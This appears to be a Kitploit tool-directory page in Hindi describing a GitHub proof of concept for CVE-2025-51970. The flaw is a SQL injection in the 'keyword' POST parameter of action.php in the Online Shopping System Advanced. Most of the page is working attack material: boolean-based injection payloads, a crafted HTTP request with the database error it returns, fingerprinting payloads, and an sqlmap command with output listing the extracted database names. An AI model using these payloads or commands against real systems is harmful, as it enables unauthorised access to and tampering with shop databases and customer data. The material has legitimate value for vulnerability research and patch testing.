Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-51970 — ऑनलाइन शॉपिंग सिस्टम एडवांस्ड में SQL इंजेक्शन (CVE-2025-51970) | Kitploit
उपकरण/GitHubGitHub/m4xiq/cve-2025-51970
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubm4xiq/cve-2025-51970

CVE-2025-51970

ऑनलाइन शॉपिंग सिस्टम एडवांस्ड में SQL इंजेक्शन (CVE-2025-51970)

रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-51970

CVE-2025-51970 - Online Shopping System Advanced में SQL इंजेक्शन

सारांश

Online Shopping System Advanced प्रोजेक्ट में PuneethReddyHC द्वारा एक गंभीर SQL इंजेक्शन भेद्यता खोजी गई। यह दोष action.php में मौजूद है, जो keyword POST पैरामीटर से उपयोगकर्ता इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है। एक हमलावर डेटा निकालने या डेटाबेस से छेड़छाड़ करने के लिए दुर्भावनापूर्ण SQL इंजेक्ट कर सकता है।


तकनीकी विवरण

  • भेद्यता प्रकार: SQL इंजेक्शन
  • प्रभावित फ़ाइल: action.php
  • पैरामीटर: keyword (POST के माध्यम से)
  • प्रभावित संस्करण: 1.0
  • हमले का प्रकार: रिमोट
  • प्रभाव: अनधिकृत डेटा एक्सेस, डेटाबेस हेरफेर

प्रूफ ऑफ कॉन्सेप्ट (PoC)

e%' AND ((42)=(43-1)) AND '0004XX7'!='0004XX7% e%' AND ((42)=(43)) AND '0004XX7'!='0004XX7% SELECT database(); -- Returns `onlineshop`

सत्य पेलोड (लॉजिक को बायपास करता है)

असत्य पेलोड (लॉजिक में विफल रहता है)


HTTP अनुरोध

root@kitploit:~
<Highlight language="http">
POST /online-shopping-system-advanced-master/action.php HTTP/1.1
Host: 192.168.1.109
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: */*
Referer: http://192.168.1.109/online-shopping-system-advanced-master/
Content-Length: 75
Connection: close
keyword=test'&search=1
</Highlight>

HTTP प्रतिक्रिया

root@kitploit:~
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2025 10:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12

Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near ''' at line 1 in 
C:\xampp\htdocs\online-shopping-system-advanced-master\action.php:193

डेटाबेस फ़िंगरप्रिंट उदाहरण


root@kitploit:~
e%' AND 2*3*8=6*8 AND '0004XX7'!='0004XX7%
e%' AND 3*2>5 AND '0004XX7'!='0004XX7%
e%' AND 3*2*0>=0 AND '0004XX7'!='0004XX7%

sqlmap के साथ स्वचालित शोषण

इस भेद्यता की पुष्टि और स्वचालित शोषण sqlmap का उपयोग करके किया जा सकता है।

प्रयुक्त कमांड

root@kitploit:~
sqlmap -u "http://192.168.1.109/action.php" --data="keyword=test&search=1" --dbs

आउटपुट

root@kitploit:~
[13:07:39] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] onlineshop
[*] performance_schema
[*] phpmyadmin
[*] test
छवि
टूल डाउनलोड करें